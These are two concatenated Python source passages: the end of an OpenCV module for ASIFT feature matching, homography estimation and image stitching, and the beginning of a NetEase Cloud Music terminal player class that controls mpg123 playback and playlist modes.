kp2s.append(kp2)
# drawing keypoints near pointer for imgf and imgb
cur_vis = cv2.drawKeypoints(cur_vis, kp1s, flags=4, color=kp_color)
cur_vis[:,w1:] = cv2.drawKeypoints(cur_vis[:,w1:], kp2s, flags=4, color=kp_color)
cv2.imshow(win, cur_vis) # show visualization
cv2.setMouseCallback(win, onmouse)
cv2.waitKey()
cv2.destroyWindow(win)
return vis
# ----------------------------SPECIALIZED FUNCTIONS---------------------------- #
def init_feature(name,features = None):
"""
This function takes parameters from a command to initialize a detector and matcher
:param name: "<sift|surf|orb>[-flann]" (str) Ex: "sift-flann"
:return: detector, matcher
"""
FLANN_INDEX_KDTREE = 1 # bug: flann enums are missing
FLANN_INDEX_LSH = 6
if features is None: features = {}
if name not in features: # if called with a different name
chunks = name.split('-')
if chunks[0] == 'sift':
detector = cv2.SIFT() # Scale-invariant feature transform
norm = cv2.NORM_L2 # distance measurement to be used
elif chunks[0] == 'surf':
detector = cv2.SURF(800) # Hessian Threshold to 800
norm = cv2.NORM_L2 # distance measurement to be used
elif chunks[0] == 'orb':
detector = cv2.ORB(400) # binary string based descriptors
norm = cv2.NORM_HAMMING # Hamming distance
else:
return None, None
if 'flann' in chunks: # FLANN based Matcher
if norm == cv2.NORM_L2: # for SIFT ans SURF
flann_params = dict(algorithm = FLANN_INDEX_KDTREE, trees = 5)
else: # for ORB
flann_params= dict(algorithm = FLANN_INDEX_LSH,
table_number = 6, # 12
key_size = 12, # 20
multi_probe_level = 1) #2
matcher = cv2.FlannBasedMatcher(flann_params, {}) # bug : need to pass empty dict (#1329)
else: # brute force matcher
matcher = cv2.BFMatcher(norm)
features[name] = detector, matcher
detector, matcher = features[name] # if possible get buffered detector and matcher
return detector, matcher
detector, matcher = init_feature(feature_name) # global detector and matcher
def affine_skew(tilt, phi, img, mask=None):
'''
affine_skew(tilt, phi, img, mask=None) -> skew_img, skew_mask, Ai
Ai - is an affine transform matrix from skew_img to img
'''
h, w = img.shape[:2]
if mask is None:
mask = np.zeros((h, w), np.uint8)
mask[:] = 255
A = np.float32([[1, 0, 0], [0, 1, 0]])
if phi != 0.0:
phi = np.deg2rad(phi)
s, c = np.sin(phi), np.cos(phi)
A = np.float32([[c,-s], [ s, c]])
corners = [[0, 0], [w, 0], [w, h], [0, h]]
tcorners = np.int32( np.dot(corners, A.T) )
x, y, w, h = cv2.boundingRect(tcorners.reshape(1,-1,2))
A = np.hstack([A, [[-x], [-y]]])
img = cv2.warpAffine(img, A, (w, h), flags=cv2.INTER_LINEAR, borderMode=cv2.BORDER_REPLICATE)
if tilt != 1.0:
s = 0.8*np.sqrt(tilt*tilt-1)
img = cv2.GaussianBlur(img, (0, 0), sigmaX=s, sigmaY=0.01)
img = cv2.resize(img, (0, 0), fx=old_div(1.0,tilt), fy=1.0, interpolation=cv2.INTER_NEAREST)
A[0] /= tilt
if phi != 0.0 or tilt != 1.0:
h, w = img.shape[:2]
mask = cv2.warpAffine(mask, A, (w, h), flags=cv2.INTER_NEAREST)
Ai = cv2.invertAffineTransform(A)
return img, mask, Ai
########################### CONVERSIONS #####################
def keyPoint2tuple(keypoint):
""" obj.angle, obj.class_id, obj.octave, obj.pt, obj.response, obj.size"""
return (keypoint.pt, keypoint.size, keypoint.angle, keypoint.response, keypoint.octave, keypoint.class_id)
def tuple2keyPoint(points, func = cv2.KeyPoint):
""" KeyPoint([x, y, _size[, _angle[, _response[, _octave[, _class_id]]]]]) -> <KeyPoint object> """
return func(*(points[0][0],points[0][1],points[1],points[2], points[3],points[4], points[5]))
def dict2keyPoint(d, func = cv2.KeyPoint):
""" KeyPoint([x, y, _size[, _angle[, _response[, _octave[, _class_id]]]]]) -> <KeyPoint object> """
return func(*(d["pt"][0],d["pt"][1],d["size"],d["angle"], d["response"],d["octave"], d["class_id"]))
class SimKeyPoint(object):
# FIXME: correct for memoizer: some warning are created if the script is run as __main__
# it would be great if cv2.KeyPoint did not have pickling incompatibilities
def __init__(self,*args):
if len(args)==1:
obj = args[0]
if isinstance(obj,dict): # it got a dictionary
self._dict.update(obj)
return
elif isinstance(obj,tuple):
args = obj
else: # it got cv2.Keypoint
self.angle = obj.angle
self.class_id = obj.class_id
self.octave = obj.octave
self.pt = obj.pt
self.response = obj.response
self.size = obj.size
return
# tupple is broadcasted as in cv2.KeyPoint
self.pt =args[0]
self.size=args[1]
self.angle =args[2]
self.response=args[3]
self.octave=args[4]
self.class_id=args[5]
def apply2kp_pairs(kp_pairs,kp1_pair,kp2_pair,func=None):
"""
apply to kp_pairs
:param kp_pairs:
:param kp1_pair:
:param kp2_pair:
:param func: function to build new copy of keypoint
:return:
"""
def withtupple(keypoint,kp_op):
if func:
keypoint = func(keypoint)
try:
keypoint = keypoint.copy()
keypoint["pt"] = np.multiply(keypoint["pt"],kp_op) # transform pt with kp_op
except:
x,y = keypoint.pt
rx,ry = kp_op
keypoint.pt = (x*rx,y*ry)
return keypoint
def withfunc(keypoint,kp_op):
if func:
keypoint = func(keypoint)
try:
keypoint = keypoint.copy()
keypoint["pt"] = kp_op(*keypoint["pt"]) # transform pt with kp_op
except:
x,y = keypoint.pt
keypoint.pt = kp_op(x,y)
return keypoint
if type(kp1_pair) is tuple: # expected tuple operands
func1 = withtupple
else:
func1 = withfunc
if type(kp2_pair) is tuple: # expected tuple operands
func2 = withtupple
else:
func2 = withfunc
return [(func1(i,kp1_pair),func2(j,kp2_pair)) for i,j in kp_pairs]
def spairs2opairs(kp_pairs,osrc_sh,sscr_sh,odst_sh,sdst_sh,func=None):
"""
convert scaled kp_pairs to original kp_pairs
:param kp_pairs: list of kp_pairs
:param osrc_sh: original source's shape
:param sscr_sh: scaled source's shape
:param odst_sh: original destine's shape
:param sdst_sh: scaled destine's shape
:param func: function to build new copy of keypoint
:return:
"""
kp1_pair = convert.getSOpointRelation(osrc_sh, sscr_sh) # fore
kp2_pair = convert.getSOpointRelation(odst_sh, sdst_sh) # back
return apply2kp_pairs(kp_pairs,kp1_pair,kp2_pair,func=func)
########################### END OF CONVERSIONS #####################
@cache.memoize(paths.TEMPPATH, ignore=["pool"])
def ASIFT(feature_name, img, mask=None, pool=pool):
'''
asift(feature_name, img, mask=None, pool=None) -> keypoints, descrs
Apply a set of affine transformations to the image, detect keypoints and
reproject them into initial image coordinates.
See http://www.ipol.im/pub/algo/my_affine_sift/ for the details.
ThreadPool object may be passed to speedup the computation.
'''
# bulding parameters of tilt and rotation variations
detector = init_feature(feature_name)[0] # it must get detector object of cv2 here to prevent conflict with memoizers
params = [(1.0, 0.0)]
# phi rotations for t tilts of the image
for t in 2**(0.5*np.arange(1,6)):
for phi in np.arange(0, 180, old_div(72.0, t)):
params.append((t, phi))
def f(p):
t, phi = p #tilt, phi (rotation)
# computing the affine transform
timg, tmask, Ai = affine_skew(t, phi, img)
# Find keypoints and descriptors with the detector
keypoints, descrs = detector.detectAndCompute(timg, tmask)
for kp in keypoints:
x, y = kp.pt
kp.pt = tuple( np.dot(Ai, (x, y, 1)) )
if descrs is None:
descrs = []
return keypoints, descrs
if pool is None:
ires = it.imap(f, params)
else:
ires = pool.imap(f, params)
keypoints, descrs = [], []
for i, (k, d) in enumerate(ires):
print('affine sampling: %d / %d\r' % (i+1, len(params)), end=' ')
keypoints.extend(k)
descrs.extend(d)
keypoints = [SimKeyPoint(obj)._dict for obj in keypoints]
#return keyPoint2tuple(keypoints), np.array(descrs)
return keypoints, np.array(descrs)
def multipleASIFT(imgs,feature_name=feature_name):
"""
Affine-SIFT for N images
:param imgs: images to apply asift
:param feature_name: eg. SIFT SURF ORB
:return: [(kp1,desc1),...,(kpN,descN)]
"""
#print 'imgf - %d features, imgb - %d features' % (len(kp1), len(kp2))
return [ASIFT(feature_name, img, pool=pool) for img in imgs]
def filter_matches(kp1, kp2, matches, ratio = 0.75):
"""
This function applies a ratio test
:param kp1: raw keypoint 1
:param kp2: raw keypoint 2
:param matches: raw matches
:param ratio: filtering ratio
:return: filtered keypoint 1, filtered keypoint 2, keypoint pairs
"""
mkp1, mkp2 = [], []
for m in matches:
if len(m) == 2 and m[0].distance < m[1].distance * ratio:
m = m[0]
mkp1.append( kp1[m.queryIdx] ) # keypoint with Index of the descriptor in query descriptors
mkp2.append( kp2[m.trainIdx] ) # keypoint with Index of the descriptor in train descriptors
p1 = np.float32([kp["pt"] for kp in mkp1])
p2 = np.float32([kp["pt"] for kp in mkp2])
kp_pairs = list(zip(mkp1, mkp2))
return p1, p2, kp_pairs
@cache.memoize(paths.TEMPPATH)
def MATCH(feature_name,kp1,desc1,kp2,desc2):
"""
use matcher and asift output to obtain Transformation matrix (TM)
:param feature_name: eg. BFMatcher, FlannBasedMatcher
:param kp1: keypoints of source image
:param desc1: descriptors of kp1
:param kp2: keypoints of destine image
:param desc2: descriptors of kp2
:return: TM
# http://docs.opencv.org/3.0-beta/doc/py_tutorials/py_feature2d/py_feature_homography/py_feature_homography.html
"""
matcher = init_feature(feature_name)[1] # it must get matcher object of cv2 here to prevent conflict with memoizers
# BFMatcher.knnMatch() returns k best matches where k is specified by the user
raw_matches = matcher.knnMatch(desc1, trainDescriptors = desc2, k = 2) #2
# If k=2, it will draw two match-lines for each keypoint.
# So we have to pass a status if we want to selectively draw it.
p1, p2, kp_pairs = filter_matches(kp1, kp2, raw_matches) #ratio test of 0.75
if len(p1) >= 4:
H, status = cv2.findHomography(p1, p2, cv2.RANSAC, 5.0) # status specifies the inlier and outlier points
print('%d / %d inliers/matched' % (np.sum(status), len(status)))
# do not draw outliers (there will be a lot of them)
#kp_pairs = [kpp for kpp, flag in zip(kp_pairs, status) if flag] # uncomment to give only good kp_pairs
else:
H, status = None, None
print('%d matches found, not enough for homography estimation' % len(p1))
return H, status, kp_pairs
def multipleMATCH(multipleASIFT, feature_name=feature_name):
"""
:param multipleASIFT: from function that returns [(kp1,desc1),...,(kpN,descN)]
:param feature_name:
:return: [(H1, mask1, kp_pairs1),....(HN, maskN, kp_pairsN)]
"""
kp1,desc1 = multipleASIFT[0]
return [MATCH(feature_name,kp1,desc1,kpN,descN) for kpN,descN in multipleASIFT[1:]]
def MATCHto(cmp, multipleASIFT, feature_name=feature_name):
"""
:param cmp: (kp0,desc0)
:param multipleASIFT: from function that returns [(kp1,desc1),...,(kpN,descN)]
:param feature_name:
:return: [(H1, mask1, kp_pairs1),....(HN, maskN, kp_pairsN)]
"""
kp1,desc1 = cmp
return [MATCH(feature_name,kp1,desc1,kpN,descN) for kpN,descN in multipleASIFT]
def invertH(H):
# inverse perspective
return np.linalg.inv(H)
def boxpads(bx,points):
points = points
minX,minY = np.min(points,0) # left_top
maxX,maxY = np.max(points,0) # right_bottom
x0,y0 = bx[0] # left_top
x1,y1 = bx[1] # right_bottom
top,bottom,left,right = 0.0,0.0,0.0,0.0
if minX<x0: left = x0-minX
if minY<y0: top = y0-minY
if maxX>x1: right = maxX-x1
if maxY>y1: bottom = maxY-y1
return [(left,top),(right,bottom)]
def transformPoint(p,H):
return cv2.perspectiveTransform(np.float64([[p]]), H)
def transformPoints(p,H):
return cv2.perspectiveTransform(np.float64([p]), H)
def getTransformedCorners(shape,H):
h,w = shape[:2]
corners = [[0, 0], [w, 0], [w, h], [0, h]] # get list of image corners
projection = transformPoints(corners, H) # get perspective of corners with transformation matrix
return projection.reshape(-1,2) # return projection points
def pads(shape1,shape2,H):
h,w = shape2[:2] # get hight,width of image
bx = [[0,0],[w,h]] # make box
corners = getTransformedCorners(shape1,H) # get corners from image
return boxpads(bx,corners)
def superpose(im1,im2,H):
# im1 on top of im2
# im1(x,y)*H = im1(u,v) -> im1(u,v) + im2(u,v)
[(left,top),(right,bottom)] = pads(im1.shape,im2.shape,H)
moveH = np.float64([[1,0,left],[0,1,top],[0,0,1]])
movedH = moveH.dot(H)
# need: top_left, bottom_left, top_right,bottom_right
h2,w2 = im2.shape
w,h = int(left + right + w2),int(top + bottom + h2)
back = cv2.warpPerspective(im2,moveH,(w,h))
fore = cv2.warpPerspective(im1,movedH,(w,h))
alfa = cv2.warpPerspective(np.ones(im1.shape[:2]),movedH,(w,h))
im = ar.overlay(back, fore, alfa)
return im,movedH
@cache.memoize(paths.TEMPPATH) # convert cv2.bilateralfilter to memoized bilateral filter
def bilateralFilter(im,d,sigmaColor,sigmaSpace):
return cv2.bilateralFilter(im,d,sigmaColor,sigmaSpace)
def asif_demo(**opts):
flag_filter_scaled = opts.get("flag_filter_scaled",False)
flag_filter_original = opts.get("flag_filter_original",False)
flag_filter_out = opts.get("flag_filter_out",False)
flag_invertH = opts.get("flag_invertH",False)
flag_show_match = opts.get("flag_show_match",True)
flag_show_result = opts.get("flag_show_result",True)
flag_save_perspective = opts.get("flag_save_perspective",False)
flag_save_result = opts.get("flag_save_result",False)
#### LOADING
#feature_name = opts.get('--feature', 'sift-flann') #default is 'sift-flann'
#detector, matcher = init_feature(feature_name)
original_fore = opts.get("original_fore",None)
scaled_fore = opts.get("scaled_fore",None)
try: fn1 = opts["fn1"]
except:
fn1 = paths.TESTPATH+'im1_2.jpg' # foreground is placed to background
if not original_fore:
original_fore = cv2.imread(fn1) # foreground
print(fn1, " Loaded...")
#### SCALING
rzyf,rzxf = opts.get("fore_scale",(400,400)) # dimensions to scale foreground
if not scaled_fore:
scaled_fore = cv2.resize(cv2.imread(fn1, 0), (rzxf, rzyf))
original_back = opts.get("original_back",None)
scaled_back = opts.get("scaled_back",None)
try: fn2 = opts["fn2"]
except:
fn2 = paths.TESTPATH+'im1_1.jpg' # background
if not original_back:
original_back = cv2.imread(fn2) # background
print(fn2, " Loaded...")
#### SCALING
rzyb,rzxb = opts.get("back_scale",(400,400)) # dimensions to scale background
if not scaled_back:
scaled_back = cv2.resize(cv2.imread(fn2, 0), (rzxb, rzyb))
#### PRE-PROCESSING
if flag_filter_scaled: # persistent by @root.memoize
d,sigmaColor,sigmaSpace = 50,100,100
scaled_fore = bilateralFilter(scaled_fore,d,sigmaColor,sigmaSpace)
scaled_back = bilateralFilter(scaled_back,d,sigmaColor,sigmaSpace)
print("merged image filtered with bilateral filter d={},sigmaColor={},sigmaSpace={}".format(d,sigmaColor,sigmaSpace))
if flag_filter_original: # persistent by @root.memoize
d,sigmaColor,sigmaSpace = 50,100,100
original_fore = bilateralFilter(original_fore,d,sigmaColor,sigmaSpace)
original_back = bilateralFilter(original_back,d,sigmaColor,sigmaSpace)
print("merged image filtered with bilateral filter d={},sigmaColor={},sigmaSpace={}".format(d,sigmaColor,sigmaSpace))
#### FEATURE DETECTOR # persistent by @root.memoize
print("finding keypoints with its descriptos...")
result = multipleASIFT([scaled_fore, scaled_back]) # OR use ASIFT for each image
#kp1,desc1 = ASIFT(feature_name, scaled_fore, mask=None, pool=pool)
#kp2,desc2 = ASIFT(feature_name, scaled_back, mask=None, pool=pool)
#### MATCHING # persistent by @root.memoize
print("matching...")
H, status, kp_pairs = multipleMATCH(result)[0] # OR use MATCH
#H, status, kp_pairs = MATCH(feature_name,kp1,desc1,kp2,desc2)
if H is not None:
if flag_invertH:
kp_pairs = [(j,i) for i,j in kp_pairs]
H = convert.invertH(H)
tmp1,tmp2,tmp3,tmp4 = original_fore,scaled_fore,original_back,scaled_back
original_fore,scaled_fore,original_back,scaled_back = tmp3,tmp4,tmp1,tmp2
shapes = original_fore.shape,scaled_fore.shape,original_back.shape,scaled_back.shape
H2 = convert.sh2oh(H, *shapes) #### sTM to oTM
if flag_show_match: # show matching
win = 'matching result'
kp_pairs2 = spairs2opairs(kp_pairs,*shapes)
print("waiting to close match explorer...")
vis = matchExplorer(win, original_fore, original_back, kp_pairs2, status, H2)
#vis = MatchExplorer(win, scaled_fore, scaled_back, kp_pairs, status, H)
# get perspective from the scaled to original Transformation matrix
bgra_fore = cv2.cvtColor(original_fore,cv2.COLOR_BGR2BGRA) # convert BGR to BGRA
fore_in_back = cv2.warpPerspective(bgra_fore,H2,(original_back.shape[1],original_back.shape[0])) # get perspective
foregray = cv2.cvtColor(fore_in_back,cv2.COLOR_BGRA2GRAY).astype(float) # convert formats to float
fore_in_back = fore_in_back.astype(float) # convert to float to make operations
saveas = "perspective.png"
if flag_save_perspective:
cv2.imwrite(saveas,fore_in_back) # save perspective
print("perspective saved as: "+saveas)
# find alfa and do overlay
alfa = fore_in_back[:,:,3].copy()
for i in range(1): # testing damage by iteration
backgray = cv2.cvtColor(original_back.astype(np.uint8),cv2.COLOR_BGR2GRAY).astype(float)
fore_in_back[:,:,3]= getalfa(foregray,backgray,alfa) #### GET ALFA MASK
original_back = ar.overlay(original_back, fore_in_back) #### MERGING
original_back = original_back.astype(np.uint8) # convert back to uint8
#### POS-PROCESSING
if flag_filter_out: # filter # persistent by @root.memoize
# http://docs.opencv.org/modules/imgproc/doc/filtering.html
d,sigmaColor,sigmaSpace =50,100,100 # best guess: (50,100,10), opencv: (9,75,75), d=-1 is filter distance until sigma
original_back = bilateralFilter(original_back,d,sigmaColor,sigmaSpace)
saveas = "merged_bilateralfilter_d_{}_sigmaColor_{}_sigmaSapace_{}.png".format(d,sigmaColor,sigmaSpace)
title = "bilateral filtered d={},sigmaColor={},sigmaSpace={}".format(d,sigmaColor,sigmaSpace)
else:
saveas = "merged_nofilter.png"
title = "merged image"
print("image merged...")
if flag_show_result: # plot result
plt = plotter.plt
plt.imshow(cv2.cvtColor(original_back,cv2.COLOR_BGR2RGB))
plt.title(title), plt.xticks([]), plt.yticks([])
plt.show()
if flag_save_result:
cv2.imwrite(saveas,original_back) # save result
print("result saved as: "+saveas)
print("process finished... ")
def asif_demo2(args=None):
#### LOADING
#feature_name = opts.get('--feature', 'sift-flann') #default is 'sift-flann'
#detector, matcher = init_feature(feature_name)
try: fn1, fn2 = args
except:
fn1 = paths.TESTPATH+'im1_2.jpg' # foreground is placed to background
fn2 = paths.TESTPATH+'im1_1.jpg' # foreground is placed to background
def check(im, fn):
if im is not None:
print(fn, " Loaded...")
else:
print(fn, " could not be loaded...")
#original_fore = cv2.imread(fn1) # foreground
#original_back = cv2.imread(fn2) # background
#checkLoaded(original_fore, fn1)
#checkLoaded(original_back, fn2)
#### SCALING
rzyf,rzxf = 400,400 # dimensions to scale foreground
rzyb,rzxb = 400,400 # dimensions to scale background
scaled_fore = cv2.resize(cv2.imread(fn1, 0), (rzxf, rzyf))
scaled_back = cv2.resize(cv2.imread(fn2, 0), (rzxb, rzyb))
check(scaled_fore, fn1)
check(scaled_back, fn2)
#### FEATURE DETECTOR # persistent by @root.memoize
print("finding keypoints with its descriptos...")
result = multipleASIFT([scaled_fore, scaled_back]) # OR use ASIFT for each image
#kp1,desc1 = ASIFT(feature_name, scaled_fore, mask=None, pool=pool)
#kp2,desc2 = ASIFT(feature_name, scaled_back, mask=None, pool=pool)
#### MATCHING # persistent by @root.memoize
print("matching...")
H, status, kp_pairs = multipleMATCH(result)[0] # OR use MATCH
#H, status, kp_pairs = MATCH(feature_name,kp1,desc1,kp2,desc2)
if H is not None:
from multiprocessing import Process
#shapes = original_fore.shape,scaled_fore.shape,original_back.shape,scaled_back.shape
#H2 = sh2oh(H,*shapes) #### sTM to oTM
#kp_pairs2 = spairs2opairs(kp_pairs,*shapes)
print("waiting to close match explorer...")
win = "stitch"
p = Process(target=superposeGraph,args= (win, scaled_fore, scaled_back, H))
p.start()
win = "inverted stitch"
p2 = Process(target=superposeGraph,args= (win, scaled_back, scaled_fore, invertH(H)))
p2.start()
win = 'matching result'
vis = explore_match(win, scaled_fore, scaled_back, kp_pairs, status, H)
p.join()
def stich():
from multiprocessing import Process
from glob import glob
from RRtool.RRtoolbox import imloader
#### LOADING
print("looking in path {}".format(paths.TESTPATH))
fns = glob(paths.TESTPATH + "*.jpg")
fns = fns[:3]
print("found {} filtered files...".format(len(fns)))
#### SCALING
rzyf,rzxf = 400,400 # dimensions to scale foregrounds
#ims = [cv2.resize(cv2.imread(i, 0), (rzxf, rzyf)) for i in fns] # normal list
ims = imloader(fns,0, (rzxf, rzyf)) # load just when needed
#img = [i for i in ims] # tests
#ims = imloader(fns,0, (rzxf, rzyf),mmap=True,mpath=paths.TEMPPATH) # load just when needed
#img = [i for i in ims] # tests
#ims = [numpymapper(data, str(changedir(fns[i],paths.TEMPPATH))) for i,data in enumerate(imloader(fns))] # Too slow
#nfns = [changedir(i,paths.TEMPPATH) for i in fns] # this get the temp files
#### FEATURE DETECTOR # persistent by @root.memoize
print("finding keypoints with its descriptors...")
descriptors = multipleASIFT(ims) # OR use ASIFT for each image
print("total descriptors {}".format(len(descriptors)))
#### MATCHING
# H, status, kp_pairs
threads,counter = [],0
print("matching...")
for i in range(len(descriptors)):
for j in range(len(descriptors)):
if j>i: # do not test itself and inverted tests
counter +=1
print("comparision No.{}".format(counter))
# FIXME inefficient code ... just 44 descriptors generate 946 Homographies
fore,back = ims[i], ims[j]
(kp1,desc1),(kp2,desc2) = descriptors[i],descriptors[j]
H, status, kp_pairs = MATCH(feature_name,kp1,desc1,kp2,desc2)
inlines,lines = np.sum(status), len(status)
pro = old_div(float(inlines),lines)
test = pro>0.5 # do test to see if both match
win = '{0}({2}) - {1}({3}) inliers({4})/matched({5}) rate({6}) pass({7})'.format(i,j,len(kp1),len(kp2), inlines,lines,pro,test)
d = Process(target=explore_match,args = (win, fore, back, kp_pairs, status, H))
d.start()
threads.append(d)
if test:
pass
for t in threads:
t.join()
if __name__ == "__main__":
#asif_demo()
asif_demo2()
#stich()
|
player.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Author: omi
# @Date: 2014-07-15 15:48:27
# @Last Modified by: omi
# @Last Modified time: 2015-01-30 18:05:08
'''
网易云音乐 Player
'''
# Let's make some noise
from __future__ import (
print_function, unicode_literals, division, absolute_import
)
import subprocess
import threading
import time
import os
import random
from future.builtins import str
from .ui import Ui
from .storage import Storage
from .api import NetEase
from .cache import Cache
from .config import Config
from .utils import notify
from . import logger
log = logger.getLogger(__name__)
class Player(object):
MODE_ORDERED = 0
MODE_ORDERED_LOOP = 1
MODE_SINGLE_LOOP = 2
MODE_RANDOM = 3
MODE_RANDOM_LOOP = 4
def __init__(self):
self.config = Config()
self.ui = Ui()
self.popen_handler = None
# flag stop, prevent thread start
self.playing_flag = False
self.process_length = 0
self.process_location = 0
self.storage = Storage()
self.cache = Cache()
self.end_callback = None
self.playing_song_changed_callback = None
self.api = NetEase()
@property
def info(self):
return self.storage.database['player_info']
@property
def songs(self):
return self.storage.database['songs']
@property
def index(self):
return self.info['idx']
@property
def list(self):
return self.info['player_list']
@property
def order(self):
return self.info['playing_order']
@property
def mode(self):
return self.info['playing_mode']
@property
def is_ordered_mode(self):
return self.mode == Player.MODE_ORDERED
@property
def is_ordered_loop_mode(self):
return self.mode == Player.MODE_ORDERED_LOOP
@property
def is_single_loop_mode(self):
return self.mode == Player.MODE_SINGLE_LOOP
@property
def is_random_mode(self):
return self.mode == Player.MODE_RANDOM
@property
def is_random_loop_mode(self):
return self.mode == Player.MODE_RANDOM_LOOP
@property
def config_notifier(self):
return self.config.get('notifier')
@property
def config_mpg123(self):
return self.config.get('mpg123_parameters')
@property
def current_song(self):
if not self.songs:
return {}
if not self.is_index_valid:
return {}
song_id = self.list[self.index]
return self.songs.get(song_id, {})
@property
def playing_id(self):
return self.current_song['song_id']
@property
def playing_name(self):
return self.current_song['song_name']
@property
def is_empty(self):
return len(self.list) == 0
@property
def is_index_valid(self):
return 0 <= self.index < len(self.list)
def notify_playing(self):
if not self.current_song:
return
if not self.config_notifier:
return
song = self.current_song
notify('正在播放: {}\n{}-{}'.format(song['song_name'], song['artist'], song['album_name']))
def notify_copyright_issue(self):
log.warning('Song {} is unavailable due to copyright issue.'.format(self.playing_id))
notify('版权限制,无法播放此歌曲')
def change_mode(self, step=1):
self.info['playing_mode'] = (self.info['playing_mode'] + step) % 5
def build_playinfo(self):
if not self.current_song:
return
self.ui.build_playinfo(
self.current_song['song_name'],
self.current_song['artist'],
self.current_song['album_name'],
self.current_song['quality'],
time.time(), pause=not self.playing_flag
)
def add_songs(self, songs):
for song in songs:
song_id = str(song['song_id'])
self.info['player_list'].append(song_id)
if song_id in self.songs:
self.songs[song_id].update(song)
else:
self.songs[song_id] = song
def stop(self):
if not self.popen_handler:
return
self.playing_flag = False
self.popen_handler.stdin.write(b'Q\n')
self.popen_handler.stdin.flush()
self.popen_handler.kill()
self.popen_handler = None
# wait process to be killed
time.sleep(0.01)
def tune_volume(self, up=0):
if not self.popen_handler:
return
new_volume = self.info['playing_volume'] + up
if new_volume > 100:
new_volume = 100
elif new_volume < 0:
new_volume = 0
self.info['playing_volume'] = new_volume
self.popen_handler.stdin.write(
'V {}\n'.format(self.info['playing_volume']).encode()
)
self.popen_handler.stdin.flush()
def switch(self):
if not self.popen_handler:
return
self.playing_flag = not self.playing_flag
self.popen_handler.stdin.write(b'P\n')
self.popen_handler.stdin.flush()
self.build_playinfo()
def run_mpg123(self, on_exit, url):
para = ['mpg123', '-R'] + self.config_mpg123
self.popen_handler = subprocess.Popen(
para,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE
)
self.tune_volume()
self.popen_handler.stdin.write(b'L ' + url.encode('utf-8') + b'\n')
self.popen_handler.stdin.flush()
endless_loop_cnt = 0
while True:
if not self.popen_handler:
break
strout = self.popen_handler.stdout.readline().decode('utf-8').strip()
if strout[:2] == '@F':
# playing, update progress
out = strout.split(' ')
self.process_location = int(float(out[3]))
self.process_length = int(float(out[3]) + float(out[4]))
elif strout[:2] == '@E':
# error, stop song and move to next
self.playing_flag = True
self.notify_copyright_issue()
break
elif strout == '@P 0':
# end, moving to next
self.playing_flag = True
break
elif strout == '':
endless_loop_cnt += 1
# 有播放后没有退出,mpg123一直在发送空消息的情况,此处直接终止处理
if endless_loop_cnt > 100:
log.warning('mpg123 error, halt, endless loop and high cpu use, then we kill it')
break
if self.playing_flag:
self.next()
else:
self.stop()
def download_lyric(self, is_transalted=False):
key = 'lyric' if not is_transalted else 'tlyric'
if key not in self.songs[str(self.playing_id)]:
self.songs[str(self.playing_id)][key] = []
if len(self.songs[str(self.playing_id)][key]) > 0:
return
if not is_transalted:
lyric = self.api.song_lyric(self.playing_id)
else:
lyric = self.api.song_tlyric(self.playing_id)
self.songs[str(self.playing_id)][key] = lyric
def download_song(self, song_id, song_name, artist, url):
def write_path(song_id, path):
self.songs[str(song_id)]['cache'] = path
self.cache.add(song_id, song_name, artist, url, write_path)
self.cache.start_download()
def start_playing(self, on_exit, args):
'''
Runs the given args in subprocess.Popen, and then calls the function
on_exit when the subprocess completes.
on_exit is a callable object, and args is a lists/tuple of args
that would give to subprocess.Popen.
'''
log.debug("%s,%s,%s" % (args['song_id'], args['song_name'], args['mp3_url']))
if 'cache' in args.keys() and os.path.isfile(args['cache']):
thread = threading.Thread(target=self.run_mpg123,
args=(on_exit, args['cache']))
else:
thread = threading.Thread(target=self.run_mpg123,
args=(on_exit, args['mp3_url']))
cache_thread = threading.Thread(
target=self.download_song,
args=(args['song_id'], args['song_name'], args['artist'], args['mp3_url'])
)
cache_thread.start()
thread.start()
lyric_download_thread = threading.Thread(target=self.download_lyric)
lyric_download_thread.start()
tlyric_download_thread = threading.Thread(target=self.download_lyric, args=(True,))
tlyric_download_thread.start()
# returns immediately after the thread starts
return thread
def replay(self):
if not self.is_index_valid:
self.stop()
if self.end_callback:
log.debug('Callback')
self.end_callback()
return
if not self.current_song:
return
self.playing_flag = True
self.build_playinfo()
self.notify_playing()
self.start_playing(lambda: 0, self.current_song)
def shuffle_order(self):
del self.order[:]
self.order.extend(list(range(0, len(self.list))))
random.shuffle(self.order)
self.info['random_index'] = 0
def new_player_list(self, type, title, datalist, offset):
self.info['player_list_type'] = type
self.info['player_list_title'] = title
# self.info['idx'] = offset
self.info['player_list'] = []
self.info['playing_order'] = []
self.info['random_index'] = 0
self.add_songs(datalist)
def append_songs(self, datalist):
self.add_songs(datalist)
def play_or_pause(self, idx):
if self.is_empty:
return
# if same "list index" and "playing index" --> same song :: pause/resume it
if self.index == idx:
if not self.popen_handler:
self.replay()
else:
self.switch()
else:
self.info['idx'] = idx
self.stop()
self.replay()
def _swap_song(self):
now_songs = self.order.index(self.index)
self.order[0], self.order[now_songs] = self.order[now_songs], self.order[0]
def _need_to_shuffle(self):
playing_order = self.order
random_index = self.info['random_index']
if random_index >= len(playing_order) or playing_order[random_index] != self.index:
return True
else:
return False
def next_idx(self):
if not self.is_index_valid:
return self.stop()
playlist_len = len(self.list)
if self.mode == Player.MODE_ORDERED:
# make sure self.index will not over
if self.info['idx'] < playlist_len:
self.info['idx'] += 1
elif self.mode == Player.MODE_ORDERED_LOOP:
self.info['idx'] = (self.index + 1) % playlist_len
elif self.mode == Player.MODE_SINGLE_LOOP:
self.info['idx'] = self.info['idx']
else:
playing_order_len = len(self.order)
if self._need_to_shuffle():
self.shuffle_order()
# When you regenerate playing list
# you should keep previous song same.
self._swap_song()
playing_order_len = len(self.order)
self.info['random_index'] += 1
# Out of border
if self.mode == Player.MODE_RANDOM_LOOP:
self.info['random_index'] %= playing_order_len
# Random but not loop, out of border, stop playing.
if self.info['random_index'] >= playing_order_len:
self.info['idx'] = playlist_len
else:
self.info['idx'] = self.order[self.info['random_index']]
if self.playing_song_changed_callback is not None:
self.playing_song_changed_callback()
def next(self):
self.stop()
self.next_idx()
self.replay()
def prev_idx(self):
if not self.is_index_valid:
self.stop()
return
playlist_len = len(self.list)
if self.mode == Player.MODE_ORDERED:
if self.info['idx'] > 0:
self.info['idx'] -= 1
elif self.mode == Player.MODE_ORDERED_LOOP:
self.info['idx'] = (self.info['idx'] - 1) % playlist_len
elif self.mode == Player.MODE_SINGLE_LOOP:
self.info['idx'] = self.info['idx']
else:
playing_order_len = len(self.order)
if self._need_to_shuffle():
